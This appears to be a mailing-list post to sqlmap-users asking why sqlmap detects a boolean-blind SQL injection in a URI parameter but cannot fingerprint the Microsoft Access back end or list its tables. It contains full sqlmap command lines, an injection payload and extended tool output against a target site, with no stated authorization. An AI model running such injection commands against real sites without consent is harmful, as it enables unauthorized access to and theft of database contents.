Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know 
there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site"; --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be 
> injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or 
> HAVING clause' injectable 
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could 
> be Microsoft Access. Do you want to skip test payloads specific for other 
> DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection 
> technique tests as there is at least one other potential injection technique 
> found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a 
> false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep 
> testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) 
> requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end 
> database management system, but from the HTML error page it was possible to 
> determinate that the back-end DBMS is Microsoft Access. Do not specify the 
> back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> 
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or 
not?
When I manually try following URL in my browser 
"http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft 
JET Database Engine Error …" so I would say the DBMS is MS Access.
When I now try to get for example all tables, then following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> 
>     sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover 
> tool
>     http://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
> mutual consent is illegal. It is the end user's responsibility to obey all 
> applicable local, state and federal laws. Developers assume no liability and 
> are not responsible for any misuse or damage caused by this program
> 
> [*] starting at 16:38:02
> 
> [16:38:05] [INFO] custom injection marking character ('*') found in option 
> '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) 
> requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end 
> database management system. Support for this DBMS will be implemented at some 
> point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> 
> [*] shutting down at 16:38:17

Even when i try to use --text-only or --not-string switches I am not able to 
receive the tables. Any ideas?


Best regards

Volker Nebelung

Attachment: signature.asc
Description: Message signed with OpenPGP using GPGMail

------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to